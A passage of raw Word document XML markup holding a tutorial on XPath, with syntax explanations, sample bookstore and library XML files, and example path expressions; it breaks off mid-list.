        <w:t xml:space="preserve"> defines the path to an element, attribute, or text in an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E4780" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1794"/>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tructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>XML paths are typically expressed as a series of steps that describe the hierarchical structure of the document. Each step is separated by a forward slash (/), and it corresponds to an element or attribute in the XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5349BEF5" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FA574" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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ibrary/book/title refers to the title element inside the book element inside the library element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB34EB" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1794"/>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Absolute and Relative Paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A1D25" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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Absolute Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Starts from the root of the document. It begins with a forward slash (/). Example: /catalog/book/title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D055D" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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Relative Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Starts from the current node. It does not begin with a forward slash. Example: book/title (relative to the current node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6369FE" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1794"/>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XPath Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E631BB" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Selects from the root node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EA188" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Selects nodes anywhere in the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957CD00" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Selects attributes of an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786056BB" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to filter nodes (e.g., selecting specific children or attributes based on conditions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC4D0E" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Wildcard that matches any element node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E54D525" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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Example XPath Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781DC15" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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bookstore/book/author - Selects all author elements under the book element in the bookstore root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE50432" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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book/title - Selects all title elements inside any book element in the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEC1AA" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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catalog/book[price&gt;30]/title - Selects title elements from book elements in catalog where the price is greater than 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB865E2" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1794"/>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Node Selection</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2961C0" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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XPath allows you to select various nodes such as elements, attributes, text, and comments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97C3A4" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1794"/>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You can also use XPath to filter or iterate through XML nodes based on specific criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B392998" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7"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Example XML Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD7CD7" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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t;catalog&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB2F07" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738012C" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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itle lang="en"&gt;XML Basics&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91E8D2" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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author&gt;John Doe&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DB972" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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price&gt;29.95&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE03F9B" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4D415" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378FB00" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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itle lang="es"&gt;Introducción a XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634212E1" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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author&gt;Maria Perez&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB2072" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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price&gt;19.95&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978A609" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74865B0B" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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t;/catalog&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615FA28A" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7"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XPath Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB778D" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1795"/>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electing a specific element</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605639E2" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1795"/>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catalog/book/title: Selects the title element inside the first book element under the catalog root element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F76EE3" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1795"/>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electing all title elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65E7DC" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1795"/>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title: Selects all title elements in the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097CC442" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1795"/>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electing based on attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C995" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1795"/>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catalog/book/title[@lang='en']: Selects the title element with the attribute lang="en" inside the book element in the catalog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F160C" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1795"/>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electing specific nodes based on condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D97AF" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1795"/>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catalog/book[price&gt;20]/title: Selects the title of the book where the price is greater than 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0FFCB" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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5DBBEA48">
          <v:rect id="_x0000_i1977" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F20C40" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCD69A" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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In XML, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to locate and access elements, attributes, and text within the document. XPath is the language used to define and evaluate these paths, offering a way to query and filter XML data efficiently. It helps in extracting or manipulating specific parts of an XML document based on its structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2224FDBB" w14:textId="29B68D38" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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B33B514">
          <v:rect id="_x0000_i1978" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2BA1" w14:textId="684ABC67" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="003850AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc196307883"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a path for a given xml file</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w14:paraId="15F79BE2" w14:textId="39FA1351" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Below is an example XML file, followed by various </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XPath paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be used to locate specific elements, attributes, or text within it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723F029" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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Example XML File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1448A" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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t;library&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F2E56" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495168AA" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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itle lang="en"&gt;Introduction to XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53293047" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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author&gt;John Doe&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DEA8F" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publisher&gt;Tech Books&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C56D3" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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price&gt;29.99&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEBC5A1" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publicationDate&gt;2023-01-15&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C097765" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22364997" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B1EEEA" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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itle lang="fr"&gt;XML pour débutants&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20273E4F" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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author&gt;Marie Dubois&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E1220" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publisher&gt;Éditions Open&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A1CA9" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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price&gt;19.99&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A3A5D" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publicationDate&gt;2022-12-01&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286DD9C1" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19477E08" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BAC63B" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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itle lang="en"&gt;Advanced XML Programming&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653B0A8" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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author&gt;David Smith&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACF418" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publisher&gt;Prog Books&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D3F78" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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price&gt;49.95&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618B715" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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publicationDate&gt;2024-03-10&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D348E53" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5444DCFE" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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t;/library&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DEEA1E" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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4AA9A22">
          <v:rect id="_x0000_i1979" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C865AE" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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XPath Paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF18386" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the title of the first book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F982C" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book/title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508DD0C9" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects the first title element inside the first book element under the root library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F9213" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the author of the second book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3C1AF" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
